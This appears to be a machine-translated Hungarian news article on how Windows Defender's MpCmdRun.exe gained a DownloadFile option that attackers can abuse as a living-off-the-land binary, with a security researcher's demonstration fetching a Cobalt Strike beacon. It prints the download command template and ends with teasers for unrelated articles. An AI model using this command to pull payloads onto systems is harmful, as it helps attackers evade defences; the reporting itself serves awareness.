A Windows Defender veszélyes alkalmazássá válik az adminok számára

  • ablakok Védő be ablakok A 10 egy nagyszerű eszköz a rendszer megvédésére, de egy új frissítés fenyegetéssé tette.
  • Egy új DownloadFile paranccsal bármilyen külső fájl letölthető, beleértve a számítógépen lévő rosszindulatú programokat is.
  • Fedezze fel a mi Szoftver szakasz a legújabb cikkekről a legújabb digitális eszközökről.
  • Ha érdekli a legújabb Windows 10 cikkeket, keresse fel átfogó oldalunkat Windows 10 Hub.
A Windows Defenderből LOLBIN válik

A Windows 10 operációs rendszerben található Windows Defender az első védelmi vonal rosszindulatú programok elleni támadások esetén, és a nagyon jó munka is.

Az egyik új frissítés során azonban a hatalmas víruskereső új DownloadFile parancsot kapott, amely lehetővé teszi, hogy bárki letölthessen bármilyen fájlt egy URL-ről a számítógép egy bizonyos elérési útjára.

Ezt kihasználásnak nevezhetjük, mivel akár rosszindulatú programok letöltésére is használható, amit Mohammad Askar biztonsági kutató fedezett fel, aki kiküldve lelete a Twitteren.

Hogyan lehet a Windows Defender felhasználásával letölteni a rosszindulatú programokat?

Nagyon egyszerű a Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) segítségével bármilyen fájlt külső forrásból letölteni a számítógépre.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Próbálkozásában Askar le tudta tölteni a Cobalt Strike jelzőt, egy jól ismert támadó eszközt ezzel a parancssorral.

Az új parancs szerepel a verzióban 4.18.2007.8-0 és újabb, ami nagyon jó kezdési időt biztosít a támadók számára.

Alapvetően ez a funkció megfordul Windows Defender egy ártalmatlan rendszerfájlba, amelyet rosszindulatú célokra lehet használni, egy LOLBIN-ba (a soros bináris fájlokból élve).

Szerencsére a káros fájl letöltése után ugyanaz a Windows Defender vagy egy másik fogja észlelni víruskereső szoftver ha jelen van.

Megbízható védelmi szoftverből a Windows Defender újabb lehetséges fenyegetéssé vált, amelyet az adminisztrátoroknak és a biztonsági szakértőknek szorosan figyelemmel kell kísérniük.

Ha bármilyen javaslata vagy észrevétele van, kérjük, hagyja alább a Megjegyzések részben.

A Microsoft rekordot döntött az Azure-kiszolgálók elleni 3,47 Tbps sebességű DDoS-támadással

A Microsoft rekordot döntött az Azure-kiszolgálók elleni 3,47 Tbps sebességű DDoS-támadássalVegyes Cikkek

A Microsoftnak sikerült új rekordot felállítania egy DDoS támadás mérséklése utánA kibertámadások 10 000 forrásból származtak, többségük ÁzsiábólJelenleg. A Microsoftnak sikerült megtartania a veze...

Olvass tovább
A végpontok közötti titkosítás kibővül a Messenger Chatekkel

A végpontok közötti titkosítás kibővül a Messenger ChatekkelVegyes Cikkek

A Facebook Messenger a leggyakrabban használt csevegőalkalmazás a világon, mivel sok eszközzel kompatibilis.A Facebook Messenger alkalmazása immár végpontok közötti titkosítást használ az összes üz...

Olvass tovább
Az Xbox One kaphat saját Monster Hunter játékot?

Az Xbox One kaphat saját Monster Hunter játékot?Vegyes Cikkek

Egy új jelentés szerint az Xbox azon a küszöbén áll, hogy megszerezze első exkluzív játékát, amelyet a Monster Hunter cím ihletett.A játékot hivatalosan még nem jelentették be, de állítólag fejlesz...

Olvass tovább